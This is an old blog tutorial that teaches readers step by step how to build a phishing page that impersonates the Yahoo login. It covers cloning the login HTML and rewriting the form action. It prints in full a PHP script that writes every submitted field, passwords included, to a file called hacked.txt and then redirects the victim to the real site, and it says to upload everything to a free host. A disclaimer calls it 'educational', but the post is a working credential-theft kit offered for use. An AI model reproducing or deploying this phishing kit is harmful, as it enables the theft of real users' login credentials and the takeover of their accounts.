How to make a Phishing page for YAHOO 2013.


Well, in my previous post i had written How to make a facebook phishing page.
Similar to the previous post in this post I am going to teach you how to make a Phishing page for YAHOO.
[NOTE: I am not responsible for any Damage caused by this tutorial to the user.This tutorial is for educational purpose only so take it only for learning]

STEP 1: Go to https://login.yahoo.com/ press ctrl+s and save this file to the desktop (or anywhere you want)
              and save this file as yahoo.html

STEP 2: Right click in the file you have created i.e login.html , click on edit and you will find a notepad                         opening with tons of HTML codes. Press ctrl+f and type "action="
              you will filnd like this:
              <form method="post" action="https://login.yahoo.com/config/login?" autocomplete="" name="login_form" id="login_form" onsubmit="return hash2(this)">

AND YOU SHOULD MAKE LIKE THIS
<form method="post" action="action.php" autocomplete="" name="login_form" id="login_form" onsubmit="return hash2(this)">
           
STEP 3: Now what you have to do is open notepad and copy the given code [you cant copy this code because it is copyright protected so look in the facebook comment from Prince Dhakal  bleow you can copy from there]:
<?php
header ('Location: https://login.yahoo.com/');
$handle = fopen("hacked.txt", "a");
foreach($_POST as $variable => $value)
 {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

Save this file and give this name "action.php" PHP extension.

STEP 4: Create a blank notepad file namely "hacked.txt".

Now you have created three files.Upload all these files to a webhosting site..As previously I said use http://www.my3gb.com/..
[NOTE: Dont try to change the name of any files you have created and to see the password go to the link of "hacked.txt" you had uploaded previously]
And dont forget to like us on facebook and +1 this post if you like...
If any problem then let me know that by commenting below...